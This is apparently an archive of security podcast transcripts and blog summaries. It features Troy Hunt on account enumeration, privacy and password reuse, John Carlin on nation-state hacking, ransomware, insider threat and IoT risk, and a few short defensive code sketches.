Troy Hunt: Well, a really good example is enumeration risks. So let's say you go and register on a website, and you put in an email address that already exists on the site, and the site says, "You can't use this, someone already has that email address." Now, we see that behavior day in and day out, but the thing to think about is, well, what that means is that someone can go to your website and find out if someone has an account or not. Now, what if I take a large number of email addresses, and I keep throwing them at the registration page, and I start to build up a profile of who has accounts or not? It suddenly starts to seem not so much fun anymore. And you say to people, "How would your business feel if they were disclosing everyone who was a member of the service?" And they sort of start to go, "Well, that wouldn't be a very good idea." "So, why are you doing it?" You know? Because the defensive pattern around this is very straightforward, you know. You've just gotta give the same response whether the account exists or not, and then you send them an email. And you say, "Well, you've already got an account, go and log in," or, "Thank you for signing up." So there are really sort of easy ways around that, and that's more of a logic issue than it is even a coding flaw.
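A minimal sketch of the anti-enumeration pattern Troy describes, assuming a hypothetical send_email helper: the registration handler answers identically whether or not the address is already registered, and the difference only shows up in the email.

    # Hypothetical registration handler illustrating the pattern above.
    def register(email, existing_accounts):
        if email in existing_accounts:
            send_email(email, "You already have an account here. Use 'forgot password' to sign in.")
        else:
            existing_accounts.add(email)
            send_email(email, "Thanks for signing up. Click the link to verify your address.")
        # Identical response either way, so probing the endpoint reveals nothing.
        return "Check your inbox to continue."

    def send_email(to, body):
        # Stand-in for a real mail call; it just prints for the sake of the sketch.
        print(f"email to {to}: {body}")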
Cindy Ng: If you were to share this talk with the business, what would they do?
Troy Hunt: Well, what it tends to do is prompt different discussions much earlier on in the design of the system. So in the case of something like enumeration, what you really want to be doing is at the point where you're sort of collecting those business requirements and having the discussion, you need to be saying to the business owner, how important is it to protect the identities of the customers of this service? Now, depending on the nature of the business, it may be more or less important. So, for example, if it is... I mean, let's just say it's Facebook. Just about everybody has a Facebook account. It's not going to be a great big sensational thing if someone goes, "Hey, I went to Facebook and I just figured out you've got..." Let's subtly put this as a site for discerning adults. Would those discerning adults have an expectation that their significant other or their workmates or their boss would not be able to go to that site, enter their email address, and discover that they like that kind of content? Well, yes, I mean, that is a very good example of where privacy is much more important. So for the most part, I really don't have a problem with either direction an organization goes, so long as it's like an evidence-based decision and they arrive there having looked at the upsides and the downsides and gone, "Well, on balance, this is the right thing to do."
Cindy Ng: You mentioned privacy. Even though people are sharing their information online, people are also worried about their privacy because you've heard 60 Minutes do a segment on data brokers selling our data, and all the data breaches that you hear almost every day, and I think technology's held to a higher standard because we're seen as progressive technology people who are basically reimagining how we're interacting with the world, and we're creating awesome wearables and apps, and what is your take on our worldwide debate on privacy? Are consumers worried enough? They're not worried enough? Or, of course, you can't speak for everyone in this world, but I want to hear from you.
Troy Hunt: It's extremely nuanced and it's nuanced for many reasons. So one of the reasons is, I first used the internet in 1995 and I was at university at the time, and for me, I'd sort of gone into adulthood without having known of an internet, and without having known of an environment where we shared this information day in and day out. And now we have situations where there are qualified adults in the workforce who have never known a time without the internet. They don't really have a memory of a time without iPhones, or a time without YouTube, or any of these things that many of us that...and I don't think I'm old, but, you know, many of us sort of remember a phase where we sort of gradually transitioned into this. And what it really means is that our tolerances for privacy and sharing are really different with younger generations than what they are with my generation, and certainly with older generations as well. And this makes things really interesting because those individuals are now starting to have a lot more influence, they're getting involved in running businesses and getting into politics and all these other things that actually impact the way we as a society operate. And they are at a very different end of the spectrum to, say, my parents' generation, who have a Facebook account so they can look at the photos that I post of the kids but would never put their own things on there. So I think that's one of the big things with privacy. How different it is for different generations.
The other thing that's really interesting with privacy now is the number of devices we have that are collecting very private information. So, you know, I have an Apple watch. And that collects a lot of data and it puts it in the cloud. We have people that have things like Alexa at home, you know, or an Amazon Echo. So, smart devices that are listening to you. We have this crazy IoT state at the moment where everything is connected, from TVs, which are effectively listening to us in our lounge rooms, and we've seen the likes of the CIA exploiting those, all the way through to adult toys that are internet-connected and have been shown to have vulnerabilities that disclose your private usage of them. So this is the sort of interesting paradox now: we've got so much collection of this very, very personal, very private data. Yet, on the other hand, we're also seeing increasing regulation to try and ensure we have privacy. So we've got things like GDPR hitting in about a year's time, which is very centered around putting the control of personal data back into the hands of those who own it. And stuff like that becomes really interesting. Because we're saying, "Hey, under GDPR, you might have a smart fridge, and the organization that holds the data from your smart fridge needs to recognize that it's your data and you can have it erased and you can have access to it and do whatever you want. And there's going to be more of it than ever because the fridge is constantly talking about, I don't know, whatever it is a smart fridge talks about." So it's a really interesting set of different factors all happening at the same time.
Cindy Ng: What's a question that you get over and over again, that you get tired of explaining, where you think, "I wish people would just get this right"?
Troy Hunt: I would say, why do you need a password manager? This week, I loaded more than a billion records into Have I Been Pwned from a couple of what they call combo lists. So, these are just big lists of email addresses and passwords built up from multiple different data breaches, we don't even know how many. And they're used for these credential stuffing attacks where attackers will take these lists, they'll feed them into software which is designed to test those credentials against services like anything from your Gmail to your Spotify account, to whatever else they can figure out to do. And they go and find how many places you've reused your password. Because if you use the same password in LinkedIn, which got breached or we saw the data come out last year, but it got breached a few years earlier, if you use that same password on LinkedIn and Spotify, and then someone's got your LinkedIn password and they go to Spotify, well, you know, now you've got a problem. Now they're in your Spotify account. And they might sell that for some small number of dollars along with hundreds of thousands of other ones. So people sort of go, "Well, yeah, but it's hard to have unique passwords that are strong."
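One practical takeaway from the credential-stuffing problem Troy describes: you can check whether a password has already appeared in breach corpora before accepting or reusing it. The sketch below uses the Pwned Passwords range API that Troy's Have I Been Pwned service exposes, sending only the first five characters of the SHA-1 hash; treat the endpoint details as an assumption to verify against the current API documentation.

    import hashlib
    import urllib.request

    def pwned_count(password):
        """Return how many times a password appears in the Pwned Passwords data,
        using the k-anonymity range API (only a 5-character hash prefix is sent)."""
        sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
        prefix, suffix = sha1[:5], sha1[5:]
        url = "https://api.pwnedpasswords.com/range/" + prefix
        with urllib.request.urlopen(url) as resp:
            for line in resp.read().decode().splitlines():
                candidate, _, count = line.partition(":")
                if candidate == suffix:
                    return int(count)
        return 0

    if __name__ == "__main__":
        # A heavily reused password like this returns a very large count.
        print(pwned_count("password123"))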
Cindy Ng: You're no doubt extremely influential in this security space and there has been endless talk about how to bring a more diverse group into the space, and I'm wondering if you would like to provide a statement of support so that women and minorities aren't just self-organizing?
Troy Hunt: So this is an enormously emotionally-charged subject. You know, like let's just start there and I'm always really, really cautious because sometimes I'll see things said on both sides of the argument, and I'll just go, "Well, you've lost the plot." But as soon as you weigh in on these things publicly, it can get very nasty.
So I guess for context, I mean, I've got a son and a daughter so I've got a foot in both camps there. I've got a wife who is becoming more active as a speaker who is actually on a security professionals panel in that same event I just mentioned in a couple of weeks' time talking about diversity in security. And I've been involved in organizing conferences where we have to choose speakers as well. It's a very difficult situation, particularly in that latter scenario because we all want to have diversity of people because the diversity gives you a richer experience. It gives you many different perspectives and backgrounds, rather than seeing the same cast of people over and over and over again.
On the other hand, we're also really cautious that we don't end up in a situation where we're saying, "We're going to choose someone because of their gender or their race or their political view or their sexuality or whatever it may be. Not because they have good content, but because of some other attribute which they've inherited." And we're very, very cautious with that, and interestingly, for my wife and for other women I speak to, the last thing in the world they want is to be chosen just because of their gender as opposed to their capabilities. So, it becomes a really, really difficult situation.
And what I find is that we know that in technology in general, women are massively underrepresented as a gender, and anecdotally, I would say within security, it's even more significant than that. It's a very, very male-dominated sector. So I think it's a really difficult thing, and interestingly, there are parts of the world where that bias is very, very different. So apparently, Egypt has a really, really strong representation of women. I think I heard it was about half or even more. So there seems to be some cultural biases that come into play, too.
Honestly, I don't have good answers for this other than trying as parents to give our kids equal opportunities and see what they're drawn to. Obviously, trying to have cool, inclusive environments, we certainly see behavior at times which would be very uncomfortable for women, and that's not cool, that's not going to make anyone feel happy. So certainly, the conferences I'm involved in really put a lot of effort into not sort of creating that environment. And to be fair as well, we're not saying to fundamentally change normal behaviors, we're saying, "Like, let's just not be dicks." You know? "Like, let's all be nice people." And this is very often what it boils down to.
Ultimately, though, until this pipeline of professionals coming through changes such that it's more evenly represented, we are going to have a significant bias towards certain genders and races and nationalities, and the causes sit way, way upstream, somewhere we have no immediate control over at the moment.
In this concluding post of John Carlin’s Lessons from the DOJ, we cover a few emerging threats: cyber as an entry point, hacking for hire and cybersecurity in the IoT era.
One of the most notable anecdotes is John's description of how easy it is to find hacking-for-hire shops on the dark web. Reviews of the most usable usernames and passwords and the most destructive botnets are widely available to shoppers. Also, expect things to get worse before they get better: with the volume of IoT devices now on the market that were developed without security by design, we'll need to find a way to mitigate the risks.
John Carlin: Let me move to emerging threats. We've talked about cyber as an entry point, a way that an attack can start, even when the cyber event isn't really the critical event in the end. Our electoral system and confidence in it wasn't damaged because there was an actual attack on the voting infrastructure; there was an attack where they stole some information that was relatively easy to steal, and then they got to combine it with a whole campaign of essentially weaponizing information, and that caused the harm. The other trend we're seeing is hacking for hire. I really worry about this one over the next five years. The dark web now is so easy to use. Well, I don't recommend this necessarily, but when you go on it, you see sophisticated sales bazaars that look as customer-friendly as Amazon.
And when I say that I mean it literally looks like Amazon. I went on one site and it's complete with customer reviews, like, "I gave him four stars, he's always been very reliable, and 15% of the stolen user names and passwords that he gives me work, which is a very high rate." Another one will be like, "This crook's botnet has always been really good at doing denial-of-service attacks, five stars!" So that's the way it looks right now on the dark web, and that's because they're making just so much, so much money they can invest in an infrastructure and it starts to look as corporate as our private companies.
What I worry about is that those tools are for rent. Take the botnet example: one of the cases that we did was the Iranian Revolutionary Guard Corps attack on the financial sector. They hit 46 different financial institutions with distributed denial-of-service attacks, taking advantage of a huge botnet of hundreds and hundreds of thousands of compromised computers. They knocked financial institutions, who have a lot of resources, offline, affected hundreds of thousands of customers, and cost tens of millions of dollars.
Right now, on the dark web, you can rent the use of an already made botnet. So the criminal group creates the botnet, they're not the ones who necessarily use it. Right now they tend to rent it to other criminal groups who will do things like GameOver Zeus, a case that we did, you know, they'll use it for profit, they'll use it for things like injecting malware that will lead to ransomware or injecting malware for a version of extortion, essentially, where they were turning on people's video cameras and taking naked pictures, and then charging money, or all the other criminal purposes you can put a botnet to.
But it doesn't take much imagination to see how a nation state or a terrorist group could just rent what the criminal groups are doing to cause an attack on your companies. In terms of emerging threats, you're certainly tracking the Internet of Things era. I mean, think about how far behind we are given where the threat is, just because we moved very, very quickly to putting everything we value from analog into digital space and connecting it to the internet, over a 25-year period roughly. We're now on the verge of an even more transformative evolution, where we connect not just information but all the devices that we need, everything from the pacemakers in our hearts. The original versions that were rolled out, and actually this is still an issue, for good medical reasons they wanted to be able to track in real time information coming out of people's hearts, but they rolled them out unencrypted, because they just don't think about it when it comes to the Internet of Things.
They were testing whether it worked, which it did, but they weren't testing whether it would work with security by design, if a bad guy, a crook, a terrorist, or a spy wanted to exploit it. Drones in the sky were rolled out with the same problem: the early commercial drones originally weren't encrypted. So, again, a 12-year-old could kill someone by taking advantage of the early pacemakers, and they could with drones as well. And then there are the automobiles on our roads. Forget the self-driving vehicle for a moment; estimates are that 70% of the cars on the road by 2020 are essentially gonna be computers on wheels.
One of the big cases we dealt with was the proof-of-concept hack where someone got in through the entertainment system to the steering and braking system, which then led to a recall of 1.4 million Jeep Cherokees. So that's the smart device used to cause new types of harm, from car accidents, to drones in the sky, to killing people through pacemakers. But we also just have the sheer volume, which is increasing exponentially, and we saw the denial-of-service attack that we've all been warning about for a period of time take place this October, knocking out essentially internet connectivity for a short period of time, because there were just so many devices, video cameras, etc., that are rolled out with default settings and can be abused. So, hopefully there will be regulatory and public policy focus to try to fix that.
In the interim though, my bottom line is, things are gonna get worse before they get better on the threat side, which is why we need to focus on the risk side. We won't spend too much time on what government's been doing. We've talked about some of it a little bit already, but the idea is, we need to, one, bring deterrence to bear, make the bad guys feel pain. Because as long as they're getting away completely cost-free, offense is gonna continue to vastly outstrip defense. Number two, we gotta figure out a way to share information better with the private sector.
And I think you're hopefully seeing some of that now, where government agencies, FBI, Justice, Secret Service, are incentivized to try to figure out ways to increase sharing of information that, for many, many years now, has been kept only on the classified side of the house. And that's a whole new approach for government, and it's just in its early steps. But we've been moving too slowly given where the threat is; we need to do more, faster. You know, just a couple weeks ago we heard the Director of the FBI say, "Okay, they came after us in 2016 in the Presidential election, but I'm telling you they're gonna do it again in 2020," and the head of the National Security Agency agreed. That's in just one sphere, so I think we're definitely in a trend now where we need to move faster in government.
What's law enforcement doing? They're increasing the cooperation. They're doing this new approach on attribution. When I was there, we issued towards the end a new presidential policy directive that tried to clarify who's in charge of threat, assets, and intel support to make it easier. That said, if any of you guys actually looked at the attachment on that, it had something like 15 different phone numbers that you're supposed to call in the event of an incident. And so, right now, what you need to do is think ahead on your crisis and risk mitigation plan, and know by name and by face who you'd call in law enforcement, by having an incident response plan that you've tested before the worst happens.
And there are reasons...I'm not saying do it in every case, but there are reasons to do it, and it can increase the intelligence you get back. It's a hedge against risk: if what you thought was a low-level act, like a criminal act, the Ferizi example, turns out to involve a terrorist, at least you notified somebody. You also want to pick a door, and this sometimes requires getting assistance; you want to pick the right door in government, one that ideally minimizes the regulatory risk to your company, depending on what space you're in, so that the information that you provide them, as a victim, isn't used against you to say that you didn't meet some standard of care.
Even if...with the shift of administration, I know generally there's a talk about trying to decrease regulations under this administration, but when it comes to cyber, everyone's so concerned about where the risk is, that for a period of time I think we're gonna continue to see a spike, that'll hopefully level off at some point as each of the regulators tries to figure out a way they can move into this space. So, what can you do? One, most importantly, treat this as an inevitability. You know there's no wall high enough, deep enough to keep the dedicated adversary out, and that means changing the mindset.
So, where...just like many other areas, this is a risk management, incident response area. Yes, you should focus on the front end on trying to minimize their ability to get in, but you also need to assume that they can, and then plan what's gonna happen when they're inside my perimeter. That means knowing what you've got, knowing where it is, doing things like assuming they can get into my system. If I have crown jewels, I shouldn't put them in a folder that's called "Crown Jewels"; maybe put something else in there that will cause the bad guy to steal the wrong information. There may be a loss of efficiency, which is why it's a risk mitigation exercise. I mean, you need to bring the business side in to figure out, how can I, assuming they get in, make it hardest for them to damage what I need most, and get back to business. Sony, despite all the public attention, their share price was up that spring, and that's because they knew exactly who to call in the government and how. They actually had a good internal corporate process in place in terms of who was responsible for handling the crisis and crisis communication.
Second, assuming again that there are sophisticated adversaries that keep getting more sophisticated and can get in if they want to, you need to have a system that's constantly monitoring internally what's going on from a risk standpoint. Because the faster you can catch what's going on inside your system, the faster you can have a plan to either kick them out, remediate it, or, if you know the data is already lost, start figuring out how you can respond to it, whether it's anything from intellectual property to salacious emails inside your system. And that way, you quickly identify and correct anomalies and reduce the loss of information.
Implement access controls; I can't hit this hard enough. This is true in government as well, by the way, along with the private sector. The default was just that it's easier to give everybody access. And I think, when it came to very highly regulated types of information, or literally, you know, source code and key intellectual property, people knew to try to limit that. But for all that other sensitive peripheral information, pricing discussions, etc., in my experience a majority of companies don't implement internal controls as to who has access and who doesn't, and part of the reason for that is that it's too complicated for the business side, so they don't pay attention to doing it, even though you can limit access to sensitive information.
Then you can focus your resources, for those who have access, on how they can use it, and really focus on training them, targeting your training efforts to those who have access to the highest-risk information. Multi-factor authentication, of course, is becoming standard. What else can you do? Segment your network. Many of the worst incidents we see are because the networks were essentially flat and we watched bad guys cruise around the network. Then there's supply chain risk: a large majority of incidents, Target, Home Depot, etc., are a different version of the supply chain but the same idea. Once you get your better practices in place, the risk can sometimes be down the supply chain or with a third-party vendor, but it's your brand that suffers in the event of a breach.
Train employees. We talked about how access controls can help you target that training. And then have an incident response plan and exercise it. Sometimes you'll go in and there will be an incident response plan, but it's hundreds of pages, and in an actual incident, nobody's going to look at it. So it needs to be simple enough that people can use it, accessible both on the IT, technical side of the house and the business side of the house, and then exercised; as you do tabletop exercises, you start spotting issues that really are more corporate governance issues inside the company. And we've talked a lot about building relationships with law enforcement. The idea is to know by name and by face, pre-crisis, who it is that you trust in law enforcement, and have that conversation with them. It's easier to get their attention if you're a Fortune 500 company. If you're smaller, you may have to do it in groups or through an association, but have a sense of who it is that you'd call, and then you need to understand who in your organization will make that call.
Long before websites, apps, and IoT devices, one primary way of learning and sharing information was the printed document. Printed documents still aren't extinct. In fact, we've given them an upgrade: nearly all modern color printers include some form of tracking information that associates documents with the printer's serial number. This type of metadata is called tracking dots. We learned about them when prosecutors alleged that 25-year-old federal contractor Reality Leah Winner printed a top-secret NSA document detailing the ongoing investigation into Russian election hacking last November and mailed it to The Intercept. Rest assured the Inside Out Security Show panelists all had a response to this form of printed metadata.
Another metadata question, one headed to the Supreme Court, is whether the government needs a warrant to access a person’s cell phone location history. “Because cell phone location records can reveal countless private details of our lives, police should only be able to access them by getting a warrant based on probable cause,” said Nathan Freed Wessler, a staff attorney with the ACLU Speech, Privacy, and Technology Project.
The latest release of SANS’ Security Awareness Report identified communication as one of the primary reasons why awareness programs thrive or fail. Yes, communication is significant, but what does communication mean?
“The goal of communication is to facilitate understanding,” said Inside Out Security Show (IOSS) panelist Mike Thompson.
Another panelist, Forrest Temple, expanded on that idea: “The skill of communication is the clarity through which that process happens. Being able to tell a regular user about the purpose behind the policy is the important part.”
However, IOSS panelist Kilian Englert pushed back on the report’s findings that insinuated users or security pros are to blame when a program fails. Yes, clear communication is vital, but he also added, “We’re all in this together.”
Others echoed this sentiment as well when we discussed a recent report that 83% of Security Pros Waste Time Fixing Co-Workers’ Non-Security Problems.
We’re living in exciting times. Today, if you have an idea as well as a small budget, you can most likely create it. This is particularly true in the technology space, which is why we’ve seen the explosion of IoT devices on the marketplace.
However, what’s uncertain is the byproduct of our enthusiastic making, innovating, and disrupting.
Hypothetical questions that used to be debated on the big screen are questions we’re now debating on our podcast. Will we be able to maintain an appropriate level of privacy within our homes? What are some positive and negative applications of a new technology? Should we retire our identification cards so that we can authenticate with biometrics?
On this week’s Inside Out Security Show, Cindy Ng, Kilian Englert, Kris Keyser and Mike Buckbee weigh in on these pressing questions.
We continue with our series with John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division. This week, we tackle ransomware and insider threat.
According to John, ransomware continues to grow, with no signs of slowing down. Not to mention, it is a vastly underreported problem. He also addressed the confusion on whether or not one should engage law enforcement or pay the ransom. And even though recently the focus has been on ransomware as an outside threat, let’s not forget insider threat because an insider can potentially do even more damage.
John Carlin: Ransomware was skyrocketing when I was in government. In the vast, vast majority of the cases, as I said earlier, we were hearing about them with the caveat that the victims were asking us not to make it public, and so it is also vastly under-reported. I don't think there's anywhere near the reporting there should be right now. I think Verizon attempted to do a good job, and there've been other reports that have attempted to get a firm number on how big the problem is. I think the most recent example that's catching people's attention is Netflix.
This is another area where I think too few companies right now are thinking through how they'd engage law enforcement. And I don't think there's an easy answer. I mean, there's a lot of confusion out there as to whether you should or shouldn't pay. And there was such confusion over FBI folks, when I was there, giving guidance saying, "Always pay," that the FBI issued guidance, and we have a link to it here, that officially says they do not encourage paying a ransom. That doesn't mean, though, that if you go to law enforcement they're gonna order you not to pay. Just like they have for years in kidnapping cases, I think they may give you advice. They can also give back valuable information. Number one, if it's a group they've been monitoring, they can tell you, and they do, as they've tried to move more towards a customer service model, whether they've seen that group attack other victims before, and if they have, whether, if you pay, they're likely to go away or not. Because some groups just take your money and continue. In some cases, the group who's asking for your money isn't the same group that hacked you, and they can help you on that as well. Secondly, just as risk reduction, as the examples I gave earlier of Ferizi or the Syrian Electronic Army show, you can end up, number one, violating certain laws when it comes to the Treasury, so-called OFAC, and material support for terrorism laws, by paying a terrorist or other group that's designated as a bad actor. But more importantly, I think for many of you, beyond that potential criminal or regulatory exposure, there's the brand. You do not want a situation where it becomes clear later that you paid off a terrorist. And so, by telling law enforcement what you're doing, you can hedge against that risk.
The other thing you need to do has nothing to do with law enforcement, but is resilience and trying to figure out, "Okay, what are my critical systems, and what's the critical data that could embarrass us? Is it locked down? What would be the risk?" The most recent public example Netflix has shown, you know, some companies decide season 5 of "Orange is the New Black," it's not worth paying off the bad guy.
We've been focusing a lot on outside actors coming inside, and something I think has gotten, or sometimes gets, too little attention is the insider threat. That's another trend. When it comes to outsider threats, the approach needs to change: instead of focusing so much on perimeter defense, we really need to focus on understanding what's inside a company, what the assets are, and what we can do to complicate the life of a bad guy when they get inside your company. Risk mitigation, in other words. A lot of the same expenditures that you would make, or the same processes that you put in place, to help mitigate that risk are also excellent at mitigating the risk from insider threat. And that's where you can get an economy of scale on your implementation.
When I took over the National Security Division, my first week, I think, was the Boston Marathon attack. But then, shortly after that, a fellow named Snowden decided to disclose, in bulk, information that was devastating to certain government agencies across the board. And one of my last acts was indicting another insider and contractor at the National Security Agency who'd similarly taken large amounts of information, in October of last year. So, if I can share one lesson, having lived through it on the government end of the spectrum, it's that sometimes our best agencies, who are very good at erecting barriers and causing complications for those who try to get at them from outside the wall, didn't have the same type of protections in place inside the perimeter, for those that were trusted. And that's something we just see so often in the private sector, as well. In terms of the amount of damage they can do, the insider may actually be the most significant threat that you face. There's also a version of the blended threat: the accidental or negligent threat that comes from human error, and then that's the gap that, no matter how good you are on the IT side, the actor exploits. In order to protect against that, you really need to figure out systems internally for flagging anomalous behavior, knowing where your data is, knowing what's valued inside your system, and then putting access controls in place.
There's a recent study that Varonis did, and this is completely consistent with my experience both in government, in terms of government systems, and in terms of providing assistance to the private sector and now giving advice to the private sector. It did not surprise me, this fact, although it's disturbing, that nearly half of the respondents indicated that at least 1,000 sensitive files are open to every employee, and that one fifth had 12,000 or more sensitive files exposed to every employee. I can't tell you how many of these I've responded to in crisis mode, where all the lawyers, etc. are trying to figure out how to mitigate risk, who they need to notify because their files may have been stolen, whether it's business customers or their consumer-type customers. And then they realize, too late at that point, that they didn't have any access controls in place. This ability to put in an access control is vital, both when you have an insider and also because it shouldn't matter how the person gained access to your system, whether they were outside-in or it's an insider. It's the same risk. And so, what I've found, and there was a good example of this that we learned through the OPM hack, is that what often happens is the IT side knows how to secure the information or put in access controls, but there's not an easy way to plug in your business side of the house. So, nearly three-fourths of employees say they know they have access to data they don't need to see. More than half said it's frequent or very frequent. And then, on the other side of the house, on the IT side, they know that three-quarters of the issues that they're seeing are insider negligence. So, you combine over-access with the fact that people make mistakes, and you get a witches' brew in terms of trying to mitigate risk. So, what you should be looking for there is, "How can I make it as easy as possible to get the business side involved?" They can determine who gets access or who doesn't get access. And the problem right now, I think, with a lot of products out there, is that it's too complicated, and so the business side ignores it and then you have to try to guess at who should or shouldn't have access. All they see then is, "Oh, it's easier just to give everybody access than it is to try to think through and implement the product. I don't know who to call or how to do it."
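As a toy illustration of surfacing that kind of over-exposure, here's a small sketch (ours, with a made-up share path) that walks a POSIX file tree and flags files readable by every user. Real access auditing on enterprise shares involves ACLs and group membership, but the idea is the same.

    import stat
    from pathlib import Path

    def world_readable_files(root):
        """Yield files under `root` whose mode grants read access to all users,
        a crude stand-in for 'sensitive files open to every employee'."""
        for path in Path(root).rglob("*"):
            if path.is_file() and path.stat().st_mode & stat.S_IROTH:
                yield path

    if __name__ == "__main__":
        for exposed in world_readable_files("/srv/shared"):  # hypothetical share path
            print(exposed)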
OPM was a major breach inside the government where, according to public reporting, China, though the government has not officially said one way or the other, so I'm just relying on public reporting, got inside our systems, our government systems. And one of the problems was they were able to move laterally, in a way, and we didn't have a product in place where we could easily see what the data was. And then it turned out afterwards, as well, that there was too much access when it came to the personally identifiable information. We had hundreds of thousands of government employees who ultimately had to get notice because you just couldn't tell what had or hadn't been breached.
When we went to fix OPM, and this is another corporate governance lesson, three times the President tried to get the Cabinet to meet so that the business side would help own this risk and decide what data people should have access to, recognizing that when you're doing risk mitigation there may be a loss of efficiency, but you should try to make a conscious decision over what's connected to the internet, and, if it's connected to the internet, who has access to it and what level of protection it gets, recognizing, you know, that as you slim access there can be a loss of efficiency. In order to do that, the person who's in charge is not the Chief Information Officer; it is the Cabinet secretary. It is the Attorney General or the Secretary of State. The President tried three times to convene his Cabinet. Twice, and I know for Justice we were guilty because they sent me and our Chief Information Officer, the Cabinet members didn't show up because they figured, "This is too complicated. It's technical. I'm gonna send the cyber IT people." The third time, the Chief of Staff to the President had to send a harsh email that said, "I don't care who you bring with you, but the President is requiring you to show up to the meeting because you own the business here, and you're the only person who can decide who has access, who doesn't, and where they should focus their efforts." So, for all the advice we were giving private companies at the time, we were good at giving advice from government. We weren't as good, necessarily, at following it. That's simply something we recommend people do.
In part two of our series, John Carlin shared with us lessons on economic espionage and weaponized information.
As former Assistant Attorney General for the U.S. Department of Justice’s National Security Division, he described how nation state actors exfiltrated data from American companies, costing them hundreds of billions of dollars in losses and more than two million jobs.
He also reminded us how important it is for organizations to work with the government as he took us down memory lane with the Sony hack. He explained how destructive an attack can be when it uses soft targets, such as email, that don't require sophisticated techniques.
John Carlin: Let me talk a little bit about economic espionage and how we moved into this new space. When I was a computer-hacking prosecutor prosecuting criminal cases, we were plenty busy. And I worked with an FBI squad, and the squad that I worked with did nothing but criminal cases. There was an intelligence squad who was across the hall, and they were behind a locked, secured compartmented door. The whole time I was doing criminal cases, about 10, 15 years ago, we never went on the other side of that door. If an agent switched squads, they just disappeared behind that locked, secured door. I then went over to the FBI to be Chief of Staff to the director, FBI Director Mueller. And when I was there, that door opened and we started to see day-in, day-out what nation state actors were doing to our country.
And what we saw were state actors, and we had a literal jumbotron screen the size of a movie theater where we could watch it through a visual interface in real time. We were watching state actors hop into places like universities, go from the university into your company, and then we would literally watch the data exfiltrate out. As we were watching this, it was an incredible feat of intelligence, but we also realized, "Hey, this is not success. We're watching billions and billions of dollars of losses of what U.S. research and development, and our allies, have created. We're seeing millions of jobs lost." One estimate has it at more than two million jobs. "What can we do to make it clear that the threat isn't about consumer data or IP, the threat is about everything that you value on your system? And how do we make clear that there's an urgent need to address this problem?"
What we did, when I came back to Justice to lead up the National Security Division, is we looked to start sharing information within government. So, for the first time, every criminal prosecutor's office across the country, all 93 U.S. Attorneys' offices, now has someone who's trained on the bits and the bytes and the Electronic Communications Privacy Act on the one hand, and, on the other hand, on how to handle sensitive sources and methods, and who's encouraged to see, can you bring a case? This only happened in 2013. This approach is still very, very new. The FBI issued an edict that said, "Thou shalt share what was formerly only on the intelligence side of the house with this new, specially-trained cadre." They then were redeployed out to the field. It's because of that change in approach that we did the first case of its kind, the indictment of five members of the People's Liberation Army, Unit 61398.
This was a specialized unit who, as we laid out in the complaint, were hitting companies like yours, and they were doing it for reasons that weren't national security, they weren't nation-state reasons. They were doing things like...Westinghouse was about to do a joint venture with a partner in China, and right before they were gonna go into business together, you watched as uniformed members of the Chinese People's Liberation Army, the second largest military in the world, went in, attacked their system, and instead of paying to lease the lead pipe as they were supposed to do the next day, they went in and stole the technical design specifications so they could get it for free. That's one example laid out in the complaint. Or to give another example, and this is why it's not just the type of information that is required to be protected by regulation, like consumer data or intellectual property: they went into a solar company, a U.S. subsidiary of a German multinational, and they stole the pricing data from that company. Then the Chinese competitor, using this information stolen by the People's Liberation Army, price dumped. They set their product just below where the competitor would be. That forced that competitor into bankruptcy.
To add insult to injury, when that company sued them for the illegal practice of price dumping, they went and stole the litigation strategy right out from under them. When people said, "Why are you indicting the People's Liberation Army? It isn't state-to-state type activity. Everybody does it, what's the big deal? Criminal process is the wrong way to do it," the reasons we made it public were a couple. One was to make public what they were doing so that businesses would know what they needed to protect themselves against. Second, what they were doing was theft, and that's never been tolerated. There's a concept in U.S. law called an easement. The idea is that if you let someone walk across your lawn long enough, they get what's called an easement: the right to walk across your lawn. That's why people put up no-trespassing signs. International law, which is primarily customary law, works the same way. The Director of the FBI compared them to a drunk burglar because they were so obvious about who they were; they didn't care if they got caught because they were so confident there would be no consequence. And as long as we continued to allow them to steal day-in, day-out, we were setting international law, we were setting the standard as one where that's okay. So, in some respects, this case was a giant "No trespassing" sign: "Get off our lawn."
The other thing that we did, though, was we wanted to show the seriousness, that this was their day job. So, we showed that the activity started at 9 a.m. Beijing time, ran at a high level from 9:00 to noon Beijing time, decreased from noon to 1:00, then increased again from 1:00 to around 6 p.m. Beijing time, and decreased on Chinese holidays and weekends. This was the day job of the military, and it's not fair, and it can't be expected, that a private company alone can defend itself against that type of adversary. This single case had an enormous impact on Chinese behavior, and I want to move a little bit to the next major cases that occurred. So, that's economic espionage, theft for monetary value.
We also started seeing some of the first destructive attacks. Everyone remembers Sony, and many people think of it as the first destructive attack on U.S. soil. It really wasn't. The first destructive attack was on Sands Casino, by what the Director of National Intelligence called Iranian-affiliated actors. When they attacked Sands, they did so because they didn't like what the head of Sands Casino had said about Iran, and the Ayatollah had called on people within Iran to attack the company. They did a destructive attack that essentially turned computers into bricks. And it was only because someone quick-thinking on the IT staff, who was not authorized by their policy, by the way, spotted what was occurring and essentially pulled the plug, segmenting the attack and keeping it confined to a small area, that it didn't cause more damage. That didn't get nearly the attention of Sony, so let's talk a little bit about Sony.
You know, I spent nearly 20 years in government working on national security and criminal threats. We did innumerable war games where we gamed out, "What's it gonna look like if a rogue nuclear-armed nation decides to attack the United States through cyber-enabled means?" And I don't know about you guys, but we all got it wrong, because not once did we guess that the first major incident was gonna be over a movie about a bunch of pot smokers. I remember every morning I'd meet with the Director of the FBI and the Attorney General to go over the threats. That Christmas we'd all watched the movie the day before and shared movie reviews. And it's the only time in my career where I've gone into the Situation Room to brief the president on a serious national security incident and had to start by trying to summarize the plot of that movie which, for those of you unlucky enough to have seen it, not that I'm passing critical judgment, is not an easy plot to summarize.
